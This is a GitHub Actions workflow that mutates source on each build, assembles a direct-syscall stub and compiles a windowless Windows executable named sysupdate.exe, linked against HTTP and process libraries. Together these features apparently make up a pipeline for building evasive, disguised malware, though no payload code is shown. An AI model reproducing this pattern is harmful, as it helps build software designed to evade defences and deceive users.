
name: CI System Pipeline
on: [push, workflow_dispatch]

jobs:
  build:
    runs-on: windows-latest
    steps:
    - uses: actions/checkout@v4

    - uses: actions/setup-python@v5
      with:
        python-version: '3.x'

    - name: Mutate
      run: python mutate.py

    - name: Build
      shell: cmd
      run: |
        call "C:\Program Files\Microsoft Visual Studio\2022\Enterprise\VC\Auxiliary\Build\vcvars64.bat"
        rc.exe resources.rc
        ml64.exe /c syscalls.asm
        cl.exe /O2 /MT /EHsc /DNDEBUG main.cpp syscalls.obj resources.res /link /SUBSYSTEM:WINDOWS /MANIFEST:EMBED /MANIFESTINPUT:app.manifest /OUT:sysupdate.exe user32.lib kernel32.lib winhttp.lib advapi32.lib psapi.lib shell32.lib

    - name: Upload Production Build
      uses: actions/upload-artifact@v4
      with:
        name: system-build-production
        path: sysupdate.exe
